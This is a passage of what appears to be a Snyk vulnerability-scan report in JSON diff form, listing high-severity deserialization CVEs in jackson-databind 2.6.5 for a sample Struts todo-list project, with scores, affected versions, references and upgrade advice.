"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2680", - "title": "GitHub Issues" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.933985Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92902", - "probability": "0.05021", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11619" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-27xj-rqx5-2255" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:59:04.995807Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.585105Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "XuYuanzhen" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2704", - "title": "Github Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.439153Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", - "epssDetails": { - "percentile": "0.93100", - "probability": "0.05308", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14062" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c265-37vj-cwcc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-05-29T15:36:30.302636Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-01T15:36:06Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-05-29T15:36:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.587184Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Al1ex@knownsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2765", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.171514Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", - "epssDetails": { - "percentile": "0.91500", - "probability": "0.03413", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14195" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mc6h-4qgp-37qh" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-14T14:48:40.820120Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-14T14:45:09Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-14T15:32:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.570033Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Topsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2688", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.405517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.94931", - "probability": "0.10105", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14060" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-j823-4qch-3rgm" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T10:29:46.691157Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:23:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:46:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.574354Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2698", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.989304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "description": "## 